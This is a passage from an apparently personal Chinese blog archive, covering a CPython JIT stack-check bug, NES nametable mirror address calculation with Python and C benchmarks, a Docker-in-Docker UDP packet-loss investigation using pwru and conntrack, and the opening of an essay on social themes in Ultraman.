我们将当前指令放在 corresponding_check_stack 中，然后在第一次调用 _PUSH_FRAME 的时候，我们会有这样的逻辑

max_space = curr_space > max_space ? curr_space : max_space;
if (first_valid_check_stack == NULL) {
    first_valid_check_stack = corresponding_check_stack;
}
else {
    // delete all but the first valid _CHECK_STACK_SPACE
    corresponding_check_stack->opcode = _NOP;
}
corresponding_check_stack = NULL;
break;

在最后第一次执行完成的时候，我们会有这样的逻辑

finish:
    if (first_valid_check_stack != NULL) {
        assert(first_valid_check_stack->opcode == _CHECK_STACK_SPACE);
        assert(max_space > 0);
        assert(max_space <= INT_MAX);
        assert(max_space <= INT32_MAX);
        first_valid_check_stack->opcode = _CHECK_STACK_SPACE_OPERAND;
        first_valid_check_stack->operand = max_space;
    }

这里实际上是将 _CHECK_STACK_SPACE 的逻辑合并到了 _CHECK_STACK_SPACE_OPERAND 中，然后新指令的操作数是我们在执行过程中确认的当前我们需要的最大的 frame，那么我们可以看到，这里的逻辑是没有问题的，那么问题出在哪里呢？

在 1ab6356ebec25f216a0eddbd81225abcb93f2d55⁴ 中，作者将在引入的新指令 _PY_FRAME_GENERAL 中 first_valid_check_stack 设置为 NULL，这会导致最后的指令替换的逻辑没法执行，同时我们在 _PUSH_FRAME 中将后续的 _CHECK_STACK_SPACE 指令替换为了 _NOP，这会导致我们 stack check 事实上的失效，最终导致进程的 crash

在确定最终的 root cause 后，这个问题就可以被修复了（就一行有效变更）

总结

这个问题是典型的查起来麻烦，修起来简单的问题，不过这个查 bug 过程我觉得挺有价值的，所以单独记录一下吧。以及 Python 的 Tier2 优化器设计真的蛮有趣的，希望后面能发现更多好玩的点（我目前在尝试做常量类型 Guard 的优化，希望能顺利）

差不多这样

Reference

[1]. https://github.com/python/cpython/issues/120437

[2]. https://www.manjusaka.blog/posts/2024/01/03/a-simple-introduction-about-python-jit/

[3]. https://github.com/python/cpython/commit/f6d9e5926b6138994eaa60d1c36462e36105733d

[4]. https://github.com/python/cpython/commit/1ab6356ebec25f216a0eddbd81225abcb93f2d55

[5]. https://github.com/python/cpython/issues/116168

实现 NES 中的一些笔记：nametable 的 mirror 计算

2024-05-24T17:00:00.000Z

随便记录一些写 NES 中的笔记，这次写一下关于 nametable 的 mirror 计算。

正文

NES 红白机的渲染过程相对来说比较复杂，为了讲今天的 mirror 计算，大致科普一下一些信息

首先我们屏幕显示的分辨率为 256240，然后我们最基本的渲染单元为 tile，一个 tile 为8个像素，意味着我们一个屏幕上有 3230 个 tile
我们屏幕上显示的背景图案是存放在 Pattern Table 中的，Pattern Table 映射到 CHR 中，可能是 RAM 也可能是 ROM，取决于 Mapper 的实现
我们为了在屏幕上显示合理的图案，我们需要一个 Index 去索引每个 Tile 的图案在 Pattern Table 中的位置。现在 3230 个 tile，我们需要 3230 个 8bit 的 Index，也就是 960 Byte 的数据。然后我们用剩下的 64 Byte 的数据来存放 Attribute Table，Attribute Table 用来存放每个 tile 的属性，比如颜色，是否翻转等等

通常来说，我们 NES 里面设计了四个 nametable，理论上的空间是 4KB 的空间。但是实际上我们内置的 PPU 的 VRAM 只有 2KB（除非特定的 Mapper 支持映射到 4KB 或者更大），可能一些同学已经想到了，因为大部分游戏背景是重复的，所以我们可以复用背景，所以我们需要做 mirror 计算

我们四个 nametables 的布局是这样的


A	B
C	D

为了方便我们后面描述，我们起始地址设置为 0x00（实际上是 0x2000）

A: 0x00 ~ 0x3FF
B: 0x400 ~ 0x7FF
C: 0x800 ~ 0xBFF
D: 0xC00 ~ 0xFFF

我们常见有两种 mirror 计算方式

垂直镜像，将 C 映射到 A，D 映射到 B
水平镜像，将 B 映射到 A，D 映射到 C

那么这个地址的换算逻辑怎么写呢？

我们最开始直观观察，我们可以发现，这个实际上是有两个 table 映射到 0x00 到 0x400 空间，剩下两个映射到 0x400 到 0x800 空间

那么我们很简单了，最暴利的方法是直接用哈希表来算

import enum

INDEX = [[0, 0, 1, 1], [0, 1, 0, 1]]


class Direction(enum.IntEnum):
    Horizontal = 0
    Vertical = 1


def mirror_lookup(direction: Direction, address: int) -> int:
    page = address // 0x400
    offset = address % 0x400
    return INDEX[direction][page] * 0x400 + offset

很简单的操作，我们根据传入的地址除以 0x400 来判断是哪个 page，然后根据 direction + page 来判断是映射到哪个区间，然后返回新的地址

这样就可以了吗？

我们看下我们上面的代码，需要一个额外的空间来存储映射关系，以及需要两次额外的寻址操作。在70年代这寸土寸金的地方，毫无疑问是无法接受的

那么我们有没有更好的方法呢？

有！

我们先来看垂直镜像，我们可以发现 A 和 C 的地址是一样的，B 和 D 的地址是一样的，那么实际上，这里我们可以转化为一个简单的对于 0x800 的取模运算

那么水平镜像的代码怎么写呢？我们可以这样想一下

我们现在布局可以想象为一个 800 * 800 的矩阵，我们可以先缩小为 400 * 400 的矩阵。即我们 A 到 B 取值范围就缩小为 0x00 到 0x3FF，同时我们 C 到 D 的取值范围也缩小为 0x400 到 0x7FF。这个时候，我们就能发现我们利用位运算 & 的性质，和 0x400 做与运算，我们就能得到 A 和 B 两个区间的基准起始地址 0x00 以及 C 和 D 两个区间的基准起始地址 0x400。最后加上模运算的结果，我们就能得到新的地址


def mirror_lookup_new(direction: Direction, address: int) -> int:
    if direction == Direction.Vertical:
        return address % (2 * 0x400)
    return ((address>>1) & 0x400) + (address % 0x400)

最后我们来跑一个 benchmark

print(
    timeit.repeat(lambda: mirror_lookup(Direction.Horizontal, 0x401), number=10000000)
)
print(
    timeit.repeat(
        lambda: mirror_lookup_new(Direction.Horizontal, 0x401),
        number=10000000,
    )
)

结果是

print(
    timeit.repeat(lambda: mirror_lookup(Direction.Horizontal, 0x401), number=10000000)
)
print(
    timeit.repeat(
        lambda: mirror_lookup_new(Direction.Horizontal, 0x401),
        number=10000000,
    )
)

我？？？哦，突然想起，Python 中位运算不一定快。这个时候我赶紧用 C 写了个版本进行测试

#include 
#include 
#include 

#define PAGE_SIZE 0x400

typedef enum {
    Horizontal = 0,
    Vertical = 1
} Direction;

int INDEX[2][4] = {{0, 0, 1, 1}, {0, 1, 0, 1}}; // Declare INDEX globally

int mirror_lookup(Direction direction, int address) {
    int page = address / PAGE_SIZE;
    int offset = address % PAGE_SIZE;
    return INDEX[direction][page] * PAGE_SIZE + offset;
}

int mirror_lookup_new(Direction direction, int address) {
    if (direction == Vertical) {
        return address % (2 * PAGE_SIZE);
    }
    return ((address >> 1) & PAGE_SIZE) + (address % PAGE_SIZE);
}

long long current_time() {
    struct timeval tv;
    gettimeofday(&tv, NULL);
    return (long long)(tv.tv_sec) * 1000000 + tv.tv_usec;
}

int main() {
    // Timing the original function
    long long start1 = current_time();
    for (int i = 0; i < 100000000; i++) {
        mirror_lookup(Horizontal, 0x401);
    }
    long long end1 = current_time();
    printf("Time taken for original function: %lld microseconds\n", end1 - start1);

    // Timing the new function
    long long start2 = current_time();
    for (int i = 0; i < 100000000; i++) {
        mirror_lookup_new(Horizontal, 0x401);
    }
    long long end2 = current_time();
    printf("Time taken for modified function: %lld microseconds\n", end2 - start2);

    return 0;
}

结果是

1 2	Time taken for original function: 355402 microseconds Time taken for modified function: 251868 microseconds

大概快了百分之30，符合预期

总结

很多时候能发现各种古早的系统里为了性能做的各种的 trick，非常好玩。

这里留个思考题

我们假设 NES 的 CPU 是理光 6502，CPU 频率 1.79 MHz，我们能否再定量分析下我们实现一个 mirror 流程的两种方法各自需要多少时钟周期？

SRE 日志：我的包去哪了？

2024-05-11T17:00:00.000Z

这算是新开的一个系列，主要是记录一些 SRE 日常帮自己/帮人调试问题的经历。会完整的记录排查的过程。希望能帮上大家的忙

这篇是一个非常常见的问题，我的包去哪了？

开篇

群里的的一个小伙伴提出了一个问题，他在用 dind （Docker in Docker）的时候，A 容器往 B 容器发送的 UDP 包，B 容器能收到，但是 A 容器收不到返回的值。

OK，是个很经典的“我的包去哪了“的问题。

我们先来构建一下本地的环境看能不能复现

本机的 IP 为 192.168.0.239
我们单独隔离出一个 network ，CIDR 为 172.18.0.0/16
我们先跑一个 dind 容器，name 为 dind1， IP 为 172.18.0.2, 暴露 UDP 4000 端口至 Host
我们再跑一个 dind 容器，name 为 dind2， IP 为 172.18.0.3
dind1 中启动一个容器运行一段简单的 UDP 服务，监听 4000 端口，IP 为 172.17.0.2，暴露 UDP 4000 端口至 dind1
dind2 中启动一个容器，IP 为 172.17.0.2, 执行 UDP 客户端，通过 192.168.0.239 的 4000 端口发送一个 UDP 报文

UDP Server 和 UDP Client 的代码如下：

import socket

def udp_echo_server(host='0.0.0.0', port=4000):
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.bind((host, port))
        print(f"Server started at {host}:{port}")

        while True:
            data, addr = sock.recvfrom(1024)  
            print(f"Received from {addr}: {data.decode()}")

            sock.sendto(data, addr)

if __name__ == "__main__":
    udp_echo_server()

import socket

def send_message(host='192.168.0.239', port=4000, message='Hello, UDP!'):
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.sendto(message.encode(), (host, port))
        data, _ = sock.recvfrom(1024)
        print(f"Received from server: {data.decode()}")

if __name__ == "__main__":
    send_message()

我们来看下现象

emmmm，能够正确复现

我们直接来抓一下包看看（直接抓虚拟网桥 br-xxxx 上的包）

唔，我们看到第三个 172.18.0.2 已经向来程回包了，那么为什么我们客户端没有收到呢？包去哪了？（实际上 wireshark 这一步已经能确定问题了）

这个时候我们祭出 pwru ，Cilium 做的工具，可以抓内核包（表现为 skb）在内核中的处理流程（感兴趣的话我可以写个实现解析），来看看

因为我们是回程的时候出的问题，所以我们需要抓 src port 为 4000 的 UDP 包，执行 sudo pwru 'src port 4000'

看下日志

0xffff9f7827643600     24 [/usr/bin/docker-proxy:53608] __netif_receive_skb_one_core
0xffff9f7827643600     24 [/usr/bin/docker-proxy:53608]                   ip_rcv
0xffff9f7827643600     24 [/usr/bin/docker-proxy:53608]              ip_rcv_core
0xffff9f7827643600     24 [/usr/bin/docker-proxy:53608]               sock_wfree
0xffff9f7827643600     24 [/usr/bin/docker-proxy:53608]             nf_hook_slow
0xffff9f7827643600     24 [/usr/bin/docker-proxy:53608]              nf_checksum
0xffff9f7827643600     24 [/usr/bin/docker-proxy:53608]           nf_ip_checksum
0xffff9f7827643600     24 [/usr/bin/docker-proxy:53608]       udp_v4_early_demux
0xffff9f7827643600     24 [/usr/bin/docker-proxy:53608]     ip_route_input_noref
0xffff9f7827643600     24 [/usr/bin/docker-proxy:53608]      ip_route_input_slow
0xffff9f7827643600     24 [/usr/bin/docker-proxy:53608]      fib_validate_source
0xffff9f7827643600     24 [/usr/bin/docker-proxy:53608]    __fib_validate_source
0xffff9f7827643600     24 [/usr/bin/docker-proxy:53608]         ip_local_deliver
0xffff9f7827643600     24 [/usr/bin/docker-proxy:53608]             nf_hook_slow
0xffff9f7827643600     24 [/usr/bin/docker-proxy:53608]  ip_local_deliver_finish
0xffff9f7827643600     24 [/usr/bin/docker-proxy:53608]  ip_protocol_deliver_rcu
0xffff9f7827643600     24 [/usr/bin/docker-proxy:53608]        raw_local_deliver
0xffff9f7827643600     24 [/usr/bin/docker-proxy:53608]                  udp_rcv
0xffff9f7827643600     24 [/usr/bin/docker-proxy:53608]           __udp4_lib_rcv
0xffff9f7827643600     24 [/usr/bin/docker-proxy:53608]              __icmp_send
0xffff9f7827643600     24 [/usr/bin/docker-proxy:53608]        __ip_options_echo
0xffff9f7827643600     24 [/usr/bin/docker-proxy:53608] security_skb_classify_flow
0xffff9f7827643600     24 [/usr/bin/docker-proxy:53608] bpf_lsm_xfrm_decode_session
0xffff9f7827643600     24 [/usr/bin/docker-proxy:53608]    __xfrm_decode_session
0xffff9f7827643600     24 [/usr/bin/docker-proxy:53608] security_xfrm_decode_session
0xffff9f7827643600     24 [/usr/bin/docker-proxy:53608] bpf_lsm_xfrm_decode_session
0xffff9f7827643600     24 [/usr/bin/docker-proxy:53608] kfree_skb_reason(SKB_DROP_REASON_NO_SOCKET)
0xffff9f7827643600     24 [/usr/bin/docker-proxy:53608]   skb_release_head_state
0xffff9f7827643600     24 [/usr/bin/docker-proxy:53608]         skb_release_data
0xffff9f7827643600     24 [/usr/bin/docker-proxy:53608]            skb_free_head
0xffff9f7827643600     24 [/usr/bin/docker-proxy:53608]             kfree_skbmem

我们看到了一个 SKB_DROP_REASON_NO_SOCKET，这个意思是因为没有对应的 socket 存在，所以直接丢弃了 skb

神奇，通常来说，我们 UDP 的包在 iptables 等路径上是由 conntrack 的存在的，意味着我们的包应该是有对应的 socket 的，为什么会没有呢？

我们来看下 dind2 conntrack 的状态，我们可以通过 /proc/net/nf_conntrack 获取到 conntrack 的信息

这里我们先看一下 dind2 的 conntrack 信息

1
2

ipv4     2 udp      17 27 src=172.17.0.2 dst=192.168.0.239 sport=34320 dport=4000 [UNREPLIED] src=192.168.0.239 dst=172.18.0.3 sport=4000 dport=34320 mark=0 zone=0 use=2
ipv4     2 udp      17 27 src=172.18.0.1 dst=172.18.0.3 sport=4000 dport=34320 [UNREPLIED] src=172.18.0.3 dst=172.18.0.1 sport=34320 dport=4000 mark=0 zone=0 use=2

啊哈！问题在这里（其实很多时候 SKB_DROP_REASON_NO_SOCKET 的问题可以先去看下 conntrack 的状态），我们去程的包是

src=172.17.0.2 dst=192.168.0.239 sport=34320 dport=4000

回程的时候变成

src=172.18.0.1 dst=172.18.0.3 sport=4000 dport=34320

这完全不一样嘛，而我们的 dind2 没有打开 34320 端口，同时 conntrack 也没有对应的状态，所以直接丢弃了 skb

那么为什么会发生这样的改变呢？我们用 pwru 来看下 skb 的处理流程，日志文件太长，我将原始文件贴在这里，欢迎大家去分析 https://gist.github.com/Zheaoli/f0a485fc3c6e5f60af486c8198f895ab

这里我们说一下日志的结论，截止到 SKB_DROP_REASON_NO_SOCKET 的时候，我们有这样一些关键变化

172.17.0.2:34320 -> 192.168.0.239:4000
172.18.0.3:34320 -> 192.168.0.239:4000
172.18.0.1:34320 -> 172.18.0.2:4000
172.18.0.2:4000 -> 172.18.0.1:34320
172.18.0.1:4000 -> 172.18.0.3:34320

我们来解释下，

第一跳非常简单，原始的包
第二条是在包到达 dind2 的时候，iptables 做了一次 SNAT 的操作，将源地址改为 dind 的 IP 地址
然后包到达宿主机后，因为 docker proxy 监听了所有的端口，所以会捕获这个包，然后根据规则，转发向 172.18.0.2
然后 docker proxy 向 172.18.0.2 转发的包，因为路由的规则，ip 地址会变成 172.18.0.1
剩下的就是正常的回程了，

写到这里大家可能已经发现了问题，我们向 192.168.0.239 直接发送的包，没有离开机器，所以 IP 地址不会被 MASQUERADE 为本机的 IP，然后直接被 docker-proxy 接管后 src ip 依旧为 172.18.0.3，导致了 conntrack 的状态不匹配，所以最终在 172.18.0.3 上没有对应的 socket，导致了 skb 被丢弃

我们可以截取一部分日志来看

0xffff9f7898af0200     10 [/usr/bin/python3.12:155497]     ipv4_pktinfo_prepare netns=4026531840 mark=0x0 iface=4(br-1534421c90dc) proto=0x0800 mtu=1500 len=11 172.18.0.3:40870->192.168.0.239:4000(udp)
0xffff9f7898af0200     10 [/usr/bin/python3.12:155497] __udp_enqueue_schedule_skb netns=4026531840 mark=0x0 iface=4(br-1534421c90dc) proto=0x0800 mtu=1500 len=11 172.18.0.3:40870->192.168.0.239:4000(udp)
0xffff9f7898af0200     19 [/usr/bin/docker-proxy:53608]          skb_consume_udp netns=0 mark=0x0 iface=0 proto=0x0800 mtu=0 len=11 172.18.0.3:40870->192.168.0.239:4000(udp)
0xffff9f7898af0200     19 [/usr/bin/docker-proxy:53608]  __consume_stateless_skb netns=0 mark=0x0 iface=0 proto=0x0800 mtu=0 len=11 172.18.0.3:40870->192.168.0.239:4000(udp)
0xffff9f7898af0200     19 [/usr/bin/docker-proxy:53608]         skb_release_data netns=0 mark=0x0 iface=0 proto=0x0800 mtu=0 len=11 172.18.0.3:40870->192.168.0.239:4000(udp)
0xffff9f7898af0200     19 [/usr/bin/docker-proxy:53608]            skb_free_head netns=0 mark=0x0 iface=0 proto=0x0800 mtu=0 len=11 172.18.0.3:40870->192.168.0.239:4000(udp)
0xffff9f7898af0200     19 [/usr/bin/docker-proxy:53608]             kfree_skbmem netns=0 mark=0x0 iface=0 proto=0x0800 mtu=0 len=11 172.18.0.3:40870->192.168.0.239:4000(udp)
0xffff9f7935554700     19 [/usr/bin/docker-proxy:53608]              udp4_hwcsum netns=4026531840 mark=0x0 iface=0 proto=0x0000 mtu=0 len=39 172.18.0.1:36794->172.18.0.2:4000(udp)
0xffff9f7935554700     19 [/usr/bin/docker-proxy:53608]              ip_send_skb netns=4026531840 mark=0x0 iface=0 proto=0x0000 mtu=0 len=39 172.18.0.1:36794->172.18.0.2:4000(udp)
0xffff9f7935554700     19 [/usr/bin/docker-proxy:53608]           __ip_local_out netns=4026531840 mark=0x0 iface=0 proto=0x0000 mtu=0 len=39 172.18.0.1:36794->172.18.0.2:4000(udp)
0xffff9f7935554700     19 [/usr/bin/docker-proxy:53608]             nf_hook_slow netns=4026531840 mark=0x0 iface=0 proto=0x0800 mtu=0 len=39 172.18.0.1:36794->172.18.0.2:4000(udp)
0xffff9f7935554700     19 [/usr/bin/docker-proxy:53608]                ip_output netns=4026531840 mark=0x0 iface=0 proto=0x0800 mtu=0 len=39 172.18.0.1:36794->172.18.0.2:4000(udp)

差不多问题就这样，实际上我们复盘整个问题排查流程，我们实际上可以在 wireshark 抓包的时候就能大致的确定问题的范围，有效利用 pwru 等新时代的工具，可以更快的定位问题。

最后

留两个课后作业

为什么其余 Host 同级别机器的包能正常和 dind1 里的 udp server 通信？
TCP 存在同样问题吗？如果不，为什么

简单聊聊奥特曼中很有趣的细节

2024-02-20T09:00:00.000Z

奥特曼其实一直以来被打上了子供向的标示，导致很多人在提起的时候总会有一种“多大年纪了，还看奥特曼”的感觉。但是实际上，奥特曼里面有很多很有趣的细节。监督和脚本们试图通过这一些细节来表达自己的很多想法。很多不乏超越时代

注：本文起始语“ヒーロが必要なんだよ，金城君。ヒーローが必要なんだ！”出自《迪迦.奥特曼》第49话，ウルトラの星/奥特之星（监督原田昌树/満田かずほ，脚本：上原正三）

注注：我本来想用“ウルトラマン、そんなに地球人が好きになったのか” 这句的（奥特曼，你就这么喜欢地球人吗?），出自《奥特曼》第39话さらばウルトラマン/再见奥特曼（监督：圆谷一，脚本：金城哲夫）。

正文

奥特曼系列的第一话是1966年7月17日的ウルトラ作戦第一號/奥特曼作战第一号，但是如果从《奥特Q》开始算的话，1966年1月2日的打倒哥美斯!则是奥特系列的起点。在从1966年到现在的这半个多世纪的时间里，日本社会和整个人类社会也是可以说风云变幻。奥特曼系列不可避免的在这个过程中，受社会思潮的影响。不同的监督和脚本试图讲述不同的故事，这也造就了奥特曼系列独特的气质

本文大概会从三个方面去聊聊奥特曼中很有趣的细节

现实映射
拍摄手法
宗教气质

现实映射

对现实的映射其实一直是各种文艺作品经典的套路。奥特曼其实也不避免。这一点在奥特曼前期四部作品中，现实映射的气质格外明显（也就是昭和四老，初代，赛文，归曼，艾斯）。这四部作品算是奠定了奥特系列现实讨论的基调。如果说概括来分的话，大体可以分为这样几类

讨论国际问题
讨论原住民问题
日本社会问题

我会挨个挑一些很有趣的细节出来聊

讨论国际问题

奥特曼里国际问题的讨论其实某种意义是对于美苏争霸这种时代大势的一种反馈，这里面代表作的两话分别是作为昭和问题三大作之一的故郷は地球/故乡是地球以及赛文奥特曼第26话超兵器R1号/超兵器R1号

先聊聊故郷は地球/故乡是地球这一话。剧情是这样：

在东京召开和平峰会之际，各国代表乘坐的飞机突然失事。科特队受命调查。发现了一艘隐形的飞船，以及飞船里的怪兽贾米拉。

在第一轮击退怪兽后，来自巴黎总部的艾伦解释了这个怪兽的来历：“諸君、あれは怪獣なのではありません。あれは……いや、彼は我々と同じ人間なのです/各位，那不是怪物，实际上是……不，他和我们一样是人类”

在美苏争霸期间，某个国家向太空发射了飞船，飞船失事后，迫降在了一个没有水和空气的星球上。在最恶劣的环境中，宇航员被迫”进化“成怪兽，在改造自己的飞船后，回到地球复仇

在知道前因后果后，科特队员一度失去了战意，但是总部的命令却非常残酷”ジャミラの正体を明かすことなく、宇宙から来た一匹の怪獣として葬り去れ！/不要揭露贾米拉的真实身份，将他作为一只来自宇宙的怪兽埋葬！”

最后在科特队员的努力下，贾米拉被击败。在结尾，井手队员站在贾米拉的纪念碑前，看着上面的文字“A JAMILA 　(1960-1993) ICI DORT 　CE GUERRIER QUI S’EST SACRIFIE EN QUETE D’IDEAL 　POUR L’HUMANITE AINSI QUE POUR LE PROGRES 　SCIENTIFIQUE”（贾米拉（1960-1993）这里长眠着一个为了人类和科学进步而献身的战士）说出了传世经典：

犠牲者はいつもこうだ。文句だけは美しいけれど/对被牺牲者都这样，挑一些场面上的赞美性的漂亮说辞罢了。

这一话除去奥特曼的打斗情节，整个文戏流畅而令人隐形深刻。人性的丑陋，冷战时的残酷在监督的手下表现的凌厉而又真实。顺带一提这一话的监督实相寺昭雄和脚本佐佐木守也贡献了奥特赛文第十二话这一传世经典

而我觉得代表作的另外一话是赛文奥特曼第26话超兵器R1号/超兵器R1号。剧情是这样，奥特警备队所属的地球防卫军创造了一种全新的武器 R1，队员们正在讨论这种武器的正当性，团和古桥队员之间发生了传世经典的对话

团：参謀にお願いしてきます、実験の中止を!/我去找参谋长，请求停止实验！
古桥：いや、忘れるなダン、地球は狙われているんだ。今の我々の力では守りきれないような強大な侵略者がきっと現れる。その時のために··/不，别忘了，丹，地球正被瞄准着。现在我们的力量是无法守住的，一定会出现我们无法抵挡的强大侵略者。为了那个时候···
团: 超兵器が必要なんですね/需要超兵器吗
古桥: 決まっているじゃないか!/这还用说吗！
团: 侵略者は、超兵器に対抗してもっと強烈な破壊兵器を作りますよ!/侵略者会制造更强大的破坏兵器来对抗超兵器！
古桥: 我々は、それよりも強力な兵器をまた作ればいいじゃないか!/我们也制造更强大的兵器不就行了吗！
团: それは、血を吐きながら続ける···、悲しいマラソンですよ/那就像是，一边吐血一边继续奔跑的，悲哀的马拉松。

吐血马拉松其实是军备竞赛很直接的注解，很生动，也很形象。在这一话中，结局也非常的令人伤感，基耶龙星/ギエロン星作为 R1 的实验地被人类摧毁，而基耶龙星兽作为整个星球最后的遗民飞往地球复仇，最后在赛文奥特曼的头镖下咽下了最后一口气。这一切到底是谁的错误？这也是脚本想留下来让人思考的问题吧

实际上流血马拉松也一直延续到了赛文90年代 OVA 三部曲中，面对何志参谋说出的

フルハシ参謀…もう貴方に遠虑することはない。歴史が証明してくれます…私が正しかったことを。太陽系の各惑星に前線基地を置き…侵略の可能性のある星に先手を撃つ。それが地球の平和を守る手段です。/古桥参谋，我已不必再跟您客气了。历史将证明，我才是正确的。在太阳系的各个行星建设前线基地，遇到有侵略可能性的星球便先发制人。这才是保护地球和平的手段。
歴史をひもとけば分かるはずだ。二つの文明が遭遇した時、必ず高度な文明が、もう一つの文明を滅亡させる。地球だけではなく、この法則は宇宙にも当て嵌まるんだよ。/翻开历史便能明白，当两大文明遭遇时，一定是发达的文明灭绝另一个文明。这个法则不仅适用于地球，也适用于宇宙。

团也不由得再次感叹 “人類はまだ続けているのか……血を吐きながら続ける悲しいマラソンを……/人类还在继续着，一边吐血一边奔跑的可悲的马拉松。”

这种黑暗森林的思路是对，是错，从立场不同的人来看答案都是不一样的。但是从如今的视角来说，可能我觉得迪迦奥特曼开头的旁白更能适合这一章节的结束

21世紀初頭、憎しみや争い事は減り、自然は美しさを取り戻そうとしていた。この星に生きるすべてのものの願い、平和がようやく叶えられようとしていた/21世纪初，仇恨和争斗减少，自然也开始恢复美丽。这个星球上生活的所有生物的愿望，和平终于要实现了。

讨论原住民问题

实际上原住民问题的讨论一直是奥特历史中很浓墨众彩的一笔，所以我选择单独把这一章从日本国内问题中分离出来。

在继续讨论前我们需要了解一点日本的国内的特殊情况。日本主要的民族冲突为两点

琉球群岛/冲绳群岛问题
北海道原住民问题

这两点其实在其余日本文艺作品中也有所提现。举两个例子，在动画《New Game》中，程序部门的主管为（阿波根うみこ/阿波根海子）（姓氏假名写法为：あはごん），她很讨厌别人以姓称呼自己（以为耻）（这个姓氏非日本本土姓）。另外一个典型例子是《银之匙》中的女主御影アキ/御影亚纪，她有无意间说本土方言的习惯，但是会在不小心说方言后表现出莫名的耻感（日本人特殊的耻感爆棚）

回到奥特曼本身，昭和问题三大作中有两作是在讨论原住民问题，分别是赛文奥特曼第42话ノンマルトの使者/农马尔特的使者，以及归曼第33话怪獣使いと少年/怪兽使者与少年。实际上早在初代奥特曼第33话禁じられた言葉/被禁止的语言中，身为冲绳人的脚本金城哲夫（金城和前面所聊到的阿松波一样便借着美菲拉斯星人之口问出了 “黙れ、ウルトラマン！貴様は宇宙人なのか？人間なのか？/闭嘴，奥特曼！你到底是宇宙人还是人类？”（这里实际上是暗问：“你是日本人，还是冲绳人”），而早田的回答“両方さ/两者都是”是否也是金城自己想说的一个答案。

实际上金城哲夫的思考并不仅限于此，在看到美军从自己家乡起飞轰炸越南的飞机后，在思考自己作为冲绳人在日本所处的尴尬地位，然后有了不朽的经典ノンマルトの使者/农马尔特的使者。在本作中，脚本陛下设定了这样一个架空场景，人类其实并不是地球的原住民，而农马尔特人才是。在大约15000年前，农马尔特人被人类赶往了海底的世界。而在本作中，农马尔特人仅存的生存地再一次的被人类所侵犯。他们放出了自己的守护怪兽。但是在赛文奥特曼将怪兽击败后，农马尔特人仅存的生存地海底都市也被奥特警备队所摧毁

桐山队长在摧毁农马尔特人时所说的台词 “我々の勝利だ！海底も我々人間のものだ！/我们胜利了！海底也是我们人类的了！” 也让这一话的意味深长。奥特曼是否是正确的，而我们是否是正确的，这种疑问大概也是脚本和监督想留给大家思考的

如果说金城哲夫对于这个问题的映射还略显含蓄的话，那么作为奥特脚本里另外一位很有名的冲绳人上原正三，对于这个问题的讽刺就是无比的辛辣，归曼第33话怪獣使いと少年/怪兽使者与少年，我觉得可能是奥史上最为残酷的一次

一个来自北海道的失去双亲的孩子，在怪兽袭击之时，被梅茨星人救下。在梅茨星人身体被地球环境污染侵蚀的愈发严重之际，少年试图从地底挖出梅茨星人的飞船，想通梅茨星人一同离开地球。在这个过程中，少年因为旁人对于他一些能力的恐惧（实际上是梅茨星人为了保护少年而做出的一些行为）而被不断的欺凌，活埋，放狗咬等等。在最后，人类的恐惧最终还是杀害了对于地球毫无侵略想法的梅茨星人。但是也放出了梅茨星人之前为保护少年所封印的怪兽。这个时候，乡秀树也陷入了对于自己战斗意义的迷茫。虽说最后还是以奥特曼获胜告终，但是这剧情足以让人感到一种彻骨的寒冷

而剧中少年的设定是北海道江差的阿伊努人，而梅茨星人的名字叫作金山，作为在日朝鲜人最常用姓氏，也不由得想起关东大地震时期日本本土对于在日朝鲜人的歧视与破坏。而少年喊出的那句 “僕の生まれた所は北海道の江差だ，僕は日本人/我出生在北海道的江差，我是日本人” ，也是意味深长

编剧在剧中设定的一个场景，少年在买面包被拒后，面对面包店老板女儿追出来给他面包的时候说出了 ”同情なんてしてもらいたくないな/我不需要你的同情“，而面包店老板女儿所做出的回应 ”同情なんかしてないわ売ってあばるたけよ/我又没同情你，只是卖给你而已“ 可能是编剧想告诉我们的东西

自由的尊重是我们所有人都应该拥有的权利。

日本社会问题

实际上奥特曼讨论日本问题一直是老传统了，其实前一章所述的原住民问题也是日本社会问题的一部分，不过被我单独拿出来讲了。而刨开老生常态的环境和反战问题之类的话题，大体可以分为几类

当代青年的迷茫
女性问题

首先聊聊当代青年迷茫的问题。其实在奥特曼最早期的年代里1960年代末到1970年代，在当时的几个大背景下

美日安保条约续约
冲绳回归日本，但是美军依旧享受治外法权
大学参与进越南战争
东大安田讲堂事件
国际左翼与国际共运

在这样一些大背景下，日本学生运动风起云涌（请不要无关联想），这一代的日本人实际上处在一个特殊的迷茫期（大家都在迷茫.jpg），这样一种朝气且迷茫的气质在艾斯奥特曼中表现的尤甚

PS：艾斯奥特曼本身就是极为左翼的一部作品

我们可以来看一下艾斯第二十话，一位从大学退学出来环游世界的青年对着北斗星司出了这样一段话

俺が大学を飛び出してきた気持ちが/我离开大学的心情
あんたなんかには分かるもんか/你这种人是没法理解的
自由だ/是自由
解放だ/是身心解放
みんな勝手とばかりやりやがって/每个人都想随心所欲的生活
真実なんてどこにもありやいい/真实感却无处存在
一体何を信じたらいいんだ俺たちば/我们到底应该相信什么

而在超兽出来后，面对即将被毁的船，北斗星司和和这位青年也有这样的对话

北斗: この町の人たちとあの船どどっちが大切なんだ/这个城市的人和那艘船，哪个更重要
青年: 俺には船のほうがだ/对我来说是船
青年: あんな超獣なんかにやられてたまるか/怎么能被那种超兽打败
青年: 俺は船を守るぞ/我要保护船
北斗：バカ野郎，ちっとは自分の命のことも考えろ/笨蛋，你好歹也考虑下自己的命
青年：船は俺の命なんだ/船就是我的命

在日本学运乃至武装暴动的大背景下，这段对话回看起来也是蛮有味道的

顺带一提，我很喜欢奥特系列脚本的一个原因在于，他们不会给出一个肯定的答案，或者说，相反他们也会表现出迷茫，比如说，在同一话里，身为一个军事组织的成员的北斗，也有着自己的迷茫

最後の航海が今から3年前か。ぢようど俺がタックへ入隊した頃だ。あいつが言うように。俺もこの船もその日から鎖につながれて，自由を失ってしまったんだろうか/这艘船最后的航行是在三年前。正好是我加入TAC的时候。就像他说的一样，我和这艘船从那天起就被锁链所束缚，失去了自由吗？

这可能也是时代的迷茫.jpg

而与此同时，在这样一种时代背景下，随着女性解放思潮的进一步发展，除开奥特曼形象受之影响（艾斯.jpg），脚本和监督也在尝试在剧集中进行讨论，归曼第43话魔神月に咆える/魔鬼下月光下咆哮和第49话狙われた女/被盯哨的女人便是其中代表作（这两话脚本都是石堂淑朗）

在43话中，伊吹队长在回家后，关于女儿美奈子有这样一段很有趣的对话

